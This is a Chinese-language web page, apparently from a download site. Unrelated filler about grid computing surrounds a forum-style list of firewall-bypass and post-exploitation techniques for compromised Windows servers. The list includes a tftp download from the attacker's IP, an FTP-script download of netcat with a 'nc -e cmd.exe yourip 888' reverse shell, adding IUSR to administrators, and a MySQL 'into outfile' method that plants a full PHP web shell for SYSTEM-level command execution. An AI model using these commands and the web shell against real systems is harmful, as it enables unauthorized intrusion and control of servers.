|
導讀網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據... 網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 比如用溢出攻擊得到權限 發現沒有開139 or 445 我們可以從內部make it崩潰: 1.net share ipc$ 例如,使用webdav溢出得到system net share 看一下 沒有任何東西 用什么東西都連不上 所以 要先打開ipc$——net share ipc$ 剩下的你愿意使用什么就可以了,比如dameware. 2.tftp.exe 獲得sa空口令,使用sqlexec鏈接,只開了80和1433怎么辦?別忘了,你是在內部控制他,防火墻是可以從內部突破的。 打開本地的tftp server 然后在sqlexec中輸入 tftp -i yourip get files 就可以了。 3.ftp 腳本 + nc 比如從80端口溢出后可以,寫一個ftp的腳本然后用ftp -s ftp.txt從你的ftp下載nc。在溢出的命令提示符下使用nc nc -e c:\winnt\system32\cmd.exe yourip 888 在本地命令提示符下 nc -l -p 888 -vv 4.iusr_xx 高權限的cmd.asp 有運氣的成分,80端口溢出,net localgroup administrators iusr_computername /add 用echo 寫一個cmd.asp…… 5.使用mysql寫的cmd.php 我轉再過一篇文章 再貼一次 通過mysql入侵 1、在默認的mysql數據庫中生成一個叫tmp的表,只有一個字段名,叫cmd,數據類型為text(可以不分大 小寫) use mysql create table tmp(cmd text) 2、在tmp表cmd字段中寫入一段php代碼(注意這個文件導出后一定要叫cmd2.php) insert into tmp values(<|><body onload=document.form1.cmd.focus()> <?if (isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd>temp.dat\");}?> <style type=\"text.css\"> <!\-\-.form1 {background:#ffffff;border-bottom:#666666 1px solid;border-left:#666666 1px solid;border- right:#666666 1px solid;border-top:#666666 1px solid;color:#3c464f;font-size:9pt;clip:rect ();cursor:text;height:auto;width:auto;margin-top:0px;margin-right:0px;margin- bottom:0px;margin-left:0px} \-\-></style><p class=\"title\"> </p><form name=\"form1\" method=\"post\" action=\"/cmd2.php\"><input type=\"text\" name\"cmd\" size=\"50\" class=\"form1 \"></from><form name=\"\form2" method=\"post\" action=\"\"><p><textarea name=\"text\" cols=\"120\" row=\"50\" class=\"form1\"><?if (isset($cmd)){readfile(\"temp.dat\");unlink(\"text.dat\");}?></textarea></p></form></body> 寫入到你剛才看見的web實際目錄中(要注意的問題是直接寫到你剛才看到的路徑中可并不能直接訪問到 cmd2.php,你可以從里往外多試試) select * form tmp into outfile <|>d:\\path\\cmd2.php<|>; 刪除 tmp表 drop table tmp; 3、訪問cmd2.php 這是你將得到的web shell是system身份的! 6.telnet 用opentelnet的腳本 7.同一防火墻內另一主機的輔助入侵 有時候一些主機使用的是硬防火墻,很多主機躲在一個防火墻下面,它們之間是彼此無保護的,如果你成功的入侵了一臺內網主機,你就可以實現向其他主機進軍。 8.一些發送到80端口的腳本 正在搜集…… 9.正在想 …… 目前就這么多想法大家補充吧 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發布的Win7純凈版系統、Win10純凈版和XP純凈版系統僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(peng896066052@126.com),我們會及時處理.
Copyright © 2018-2020 雨林木風下載站
